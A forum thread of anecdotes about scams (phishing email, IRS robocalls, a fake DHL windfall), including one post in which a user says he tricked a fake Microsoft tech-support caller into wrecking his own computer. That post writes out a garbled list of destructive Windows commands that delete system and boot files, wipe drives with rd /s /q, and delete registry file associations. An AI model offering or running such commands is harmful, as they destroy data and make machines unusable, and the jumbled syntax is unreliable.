Alas, as much as I would love to have that kind of dough, this would only make me poorer, as I know it is only another scam.
That is the only way these things come in, is as scams. never anything legitimate.

Also, I'm pretty sure DHL doesn't handle this sort of thing.

A few days ago, I got a message on my old college e-mail account. I think another student's account got hacked, causing it to send out phishing e-mails purporting to be from a local credit union. The scam was fairly well-made, but the bad writing was a dead giveaway.

I don't get much e-mail spam these days, but I get lots of robocalls on my phone. IRS scams are especially fashionable.
Course clear! You got a card.

Lets just say: I really wish I was able to record this call.

I got a call on my cellphone from someone claiming to be Microsoft technical support (Yeah, like this hasn't happened before...what makes this even better is that I didn't have my computer with me...)

I talked with them, and acted as though I was doing as they asked, up until they wanted me to allow them to connect remotely.
I told them an outright lie, that it was waiting for a command from them, in addition to telling them I had seen this before.

I told them that they needed to open their command prompt, and enter the following commands:

WARNING! The following commands will render your computer inoperable! DO NOT test these, DO NOT enter these on your own system. We will not be held responsible for any idiots who decide to test these commands!

delete %systemdrive%\*.* /f /sattrib -r -s -h

c:\autoexec.batdel

c:\autoexec.batattrib -r -s -h

c:\boot.inidel

c:\boot.iniattrib -r -s -h c:\ntldrdel

c:\ntldrattrib -r -s -h

c:\windows\win.inidel c:\windows\win.iniSTART

reg delete HKCR/.exeSTART

reg delete HKCR/.dllSTART

reg delete HKCR/*rd/s/q/D:\rd/s/q/ C:\rd/s/q/ E:\
In addition to adding:

hkey_local_machinesoftwaremicrosftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_local_machinesoftwaremicrosftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:window

To the system registry, and getting them to reboot the system.

You have not heard the levels of "Blind rage" this person had after they bricked their own system.
I left them with the following:
"Your on MY turf! And your first mistake was underestimating me. While I have no idea how you got this number, I think you'll find it interesting to know that I didn't even have a computer with me. Stop now, quit praying on the ignorant, and get an actual job, or you will eventually find worse people than I."

This is where I hung up.

This is awesome indeed. I guess this proves that those tech support scammers aren't always the brightest bulbs in the batch.
